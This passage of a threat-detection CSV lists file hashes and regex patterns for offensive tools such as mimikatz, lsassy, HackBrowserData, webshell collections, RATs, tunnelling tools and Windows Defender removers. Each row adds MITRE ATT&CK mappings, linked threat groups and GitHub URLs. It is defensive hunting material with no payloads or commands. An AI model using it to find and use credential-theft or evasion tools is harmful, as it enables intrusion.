"*9ab40ecd7212576f2894c9e3d2eff74c62554e3abab7453c8edd7a7249c8b3f0*",".{0,1000}9ab40ecd7212576f2894c9e3d2eff74c62554e3abab7453c8edd7a7249c8b3f0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31759" "*9ab8a5bbfcdac675219e4415487b8a34270102bb34089609378abe8ea071d13a*",".{0,1000}9ab8a5bbfcdac675219e4415487b8a34270102bb34089609378abe8ea071d13a.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31760" "*9abd6408e999901f0b7504eb679d0403f49589b7ecaaa5588923daa0bb22f186*",".{0,1000}9abd6408e999901f0b7504eb679d0403f49589b7ecaaa5588923daa0bb22f186.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","31761" "*9AC25A8825407CCB6089BC7A2DF530D1830795B7E71A981ECEE4C5F48387B37A*",".{0,1000}9AC25A8825407CCB6089BC7A2DF530D1830795B7E71A981ECEE4C5F48387B37A.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","31762" "*9acdf1fd60fb9b5185fab1f18b843757f05f34f73ce947b71498d494a9e30843*",".{0,1000}9acdf1fd60fb9b5185fab1f18b843757f05f34f73ce947b71498d494a9e30843.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","31765" "*9ad6a5728ea235b3ed9522a352a6f39fa92d3ac2b5bfebc6fae66638deb76b49*",".{0,1000}9ad6a5728ea235b3ed9522a352a6f39fa92d3ac2b5bfebc6fae66638deb76b49.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31766" "*9ad6a5728ea235b3ed9522a352a6f39fa92d3ac2b5bfebc6fae66638deb76b49*",".{0,1000}9ad6a5728ea235b3ed9522a352a6f39fa92d3ac2b5bfebc6fae66638deb76b49.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - 
APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31767" "*9ad6daccfd1d3d349a93950f599eed59280268431d76bad7fc624d4cd4c565a5*",".{0,1000}9ad6daccfd1d3d349a93950f599eed59280268431d76bad7fc624d4cd4c565a5.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#filehash","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","31768" "*9ae37b21e20b611787f1219137b545597235c23fd54c0e73919b9ae3266bd046*",".{0,1000}9ae37b21e20b611787f1219137b545597235c23fd54c0e73919b9ae3266bd046.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","TA2541 - APT-C-36","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","0","#filehash","N/A","10","10","92","39","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z","31769" 
"*9ae751fb94283840a31634a56a3d2a8010949694378a1ae3fea51acd98b52fa5*",".{0,1000}9ae751fb94283840a31634a56a3d2a8010949694378a1ae3fea51acd98b52fa5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31770" "*9ae914a31cb9728ac8bb4519698f992af1da69233f48eaf690e9e87cfc4445be*",".{0,1000}9ae914a31cb9728ac8bb4519698f992af1da69233f48eaf690e9e87cfc4445be.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","31771" "*9aeafd043bc6edebba1acbf6f457a63be0edd623899f6245b71ac2e7ba61e03d*",".{0,1000}9aeafd043bc6edebba1acbf6f457a63be0edd623899f6245b71ac2e7ba61e03d.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","31772" "*9af2825ac48d01706aa0e6582cc477b4e1a561bf4dbff66608b68031347b8559*",".{0,1000}9af2825ac48d01706aa0e6582cc477b4e1a561bf4dbff66608b68031347b8559.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# 
offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31773" "*9b0a4d1b72901510834789ba7c2a8bc8806c84b5cb06b29db4aba208a0e26654*",".{0,1000}9b0a4d1b72901510834789ba7c2a8bc8806c84b5cb06b29db4aba208a0e26654.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31778" "*9b0c3ab3b24b993410578c961a370a1ca59fc5685a9888596fae81f65eed7d8a*",".{0,1000}9b0c3ab3b24b993410578c961a370a1ca59fc5685a9888596fae81f65eed7d8a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31779" "*9b140ac9343598961b3d5699eedc389d78c7c88271453fa37c7e3d2853364234*",".{0,1000}9b140ac9343598961b3d5699eedc389d78c7c88271453fa37c7e3d2853364234.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth 
Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","31781" "*9b191adfb91bb2ee0881f26917a18e2079e054d3d69c5bfcb9e3dff55d9c0c16*",".{0,1000}9b191adfb91bb2ee0881f26917a18e2079e054d3d69c5bfcb9e3dff55d9c0c16.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31782" "*9b1bcec7eb978a3412a5ec172181074837f08f4f9c256e8d9f6a8d7d2ce34d74*",".{0,1000}9b1bcec7eb978a3412a5ec172181074837f08f4f9c256e8d9f6a8d7d2ce34d74.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31783" "*9b1c4a631b0c723cdecfc294363b8d10a969dcd3baaf9045ec1fb775f289148b*",".{0,1000}9b1c4a631b0c723cdecfc294363b8d10a969dcd3baaf9045ec1fb775f289148b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux 
#filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31784" "*9b287794f93df5f5bf9dbc8133ed9f6c84c270b87812e6b9426c1aded5eda58b*",".{0,1000}9b287794f93df5f5bf9dbc8133ed9f6c84c270b87812e6b9426c1aded5eda58b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","31785" "*9b33e5ff2cc99df282013554ee5cc3a9a0fe737510af24717b48f93c5d66b94a*",".{0,1000}9b33e5ff2cc99df282013554ee5cc3a9a0fe737510af24717b48f93c5d66b94a.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","31786" "*9b361496733f31eed59d74b17f7eab74e3175f69e14fb24f9dbde5a359c2c39b*",".{0,1000}9b361496733f31eed59d74b17f7eab74e3175f69e14fb24f9dbde5a359c2c39b.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#filehash","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","31787" "*9b379b8478d9ec722c72d0eff669e132dc52c44e8d27bea832b6fbe6d4f00f11*",".{0,1000}9b379b8478d9ec722c72d0eff669e132dc52c44e8d27bea832b6fbe6d4f00f11.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - 
TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31788" "*9b3d82bb1aff3a17a490dd4da09cd315d8e94a52b8caa31ef7a7cf2a89c9d87a*",".{0,1000}9b3d82bb1aff3a17a490dd4da09cd315d8e94a52b8caa31ef7a7cf2a89c9d87a.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","31789" "*9b432d28fab76406a94c7b59e20a71cd65d1bde26b41bcd6d31e02387e8e81cf*",".{0,1000}9b432d28fab76406a94c7b59e20a71cd65d1bde26b41bcd6d31e02387e8e81cf.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","31792" "*9b4c1be9061e211f2133b67de7e5e51eb6ecf3f035f917a52137395bcbb8bf2e*",".{0,1000}9b4c1be9061e211f2133b67de7e5e51eb6ecf3f035f917a52137395bcbb8bf2e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - 
FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31794" "*9b4c1be9061e211f2133b67de7e5e51eb6ecf3f035f917a52137395bcbb8bf2e*",".{0,1000}9b4c1be9061e211f2133b67de7e5e51eb6ecf3f035f917a52137395bcbb8bf2e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31795" 
"*9b4c57e7b68da80e3949caccaca1742dfdbe31be6f033096f8c9d72a7a0e7947*",".{0,1000}9b4c57e7b68da80e3949caccaca1742dfdbe31be6f033096f8c9d72a7a0e7947.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","31796" "*9b5609bdc5e1b30c20848a3268d4722d9e9befb7f1b620b1d2bf9b89a3429e93*",".{0,1000}9b5609bdc5e1b30c20848a3268d4722d9e9befb7f1b620b1d2bf9b89a3429e93.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31799" "*9b58d53cfea14b281ec196a1989aedb62550857ad91273708da6cce760f51306*",".{0,1000}9b58d53cfea14b281ec196a1989aedb62550857ad91273708da6cce760f51306.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","31800" "*9b723acfd67b3a99b88251493db23b8af6fedc8e36395096acec7332f61b86ba*",".{0,1000}9b723acfd67b3a99b88251493db23b8af6fedc8e36395096acec7332f61b86ba.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","#filehash","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","31806" "*9b732d0af2afc8020a4d4416801e44366bf8793c2bd1e519254fbf31c3268065*",".{0,1000}9b732d0af2afc8020a4d4416801e44366bf8793c2bd1e519254fbf31c3268065.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31807" "*9b77b2d26cc5e1764b87af4178b3b5b35338aab8df80e5f311a10fbadec119f5*",".{0,1000}9b77b2d26cc5e1764b87af4178b3b5b35338aab8df80e5f311a10fbadec119f5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31808" "*9b7a6b25b1f242d4777bbda7ee34d1dab6d0cdcea708c6e0e2fa7ffb4cd9cf7b*",".{0,1000}9b7a6b25b1f242d4777bbda7ee34d1dab6d0cdcea708c6e0e2fa7ffb4cd9cf7b.{0,1000}","offensive_tool_keyword","sharphound","C# Data 
Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","31809" "*9b7e4c777b2fed27f94d05d195c52bdc036482820274dfa345eb9bbd557d4ac7*",".{0,1000}9b7e4c777b2fed27f94d05d195c52bdc036482820274dfa345eb9bbd557d4ac7.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","31810" "*9b7e60f60ab5e2680554d392c3e8a84b9e367a6e452eaab011d1eef963aad894*",".{0,1000}9b7e60f60ab5e2680554d392c3e8a84b9e367a6e452eaab011d1eef963aad894.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","#filehash","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","31811" "*9B823D93-BF1B-407B-A4CD-231347F656AD*",".{0,1000}9B823D93\-BF1B\-407B\-A4CD\-231347F656AD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in 
malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","31813" "*9b8901200d2f4fc535e25641e40d767a095a597e3d560f3b459d5546d6e3e551*",".{0,1000}9b8901200d2f4fc535e25641e40d767a095a597e3d560f3b459d5546d6e3e551.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31815" "*9b897f1e3f2a174e48499a060b1017b67e8ea49991b6d3f673fadb96abae6273*",".{0,1000}9b897f1e3f2a174e48499a060b1017b67e8ea49991b6d3f673fadb96abae6273.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31817" "*9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45*",".{0,1000}9b9850751be2515c8231e5189015bbe6\:49ef7638d69a01f26d96ed673bf50c45.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - 
TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","#filehash","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","31819" "*9ba444580d4d5eb6f4b020f68ee625a36b6c5b5210c128f148e4de929da0508d*",".{0,1000}9ba444580d4d5eb6f4b020f68ee625a36b6c5b5210c128f148e4de929da0508d.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","31820" "*9baeebed17f1945b5680bdf630cbe15de32826aa2f402d23df0a991ae73a2235*",".{0,1000}9baeebed17f1945b5680bdf630cbe15de32826aa2f402d23df0a991ae73a2235.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31822" "*9bb0c39f776edc0869cb86fd3de17fccfde02dffe82290dde30997ca10e864fb*",".{0,1000}9bb0c39f776edc0869cb86fd3de17fccfde02dffe82290dde30997ca10e864fb.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense 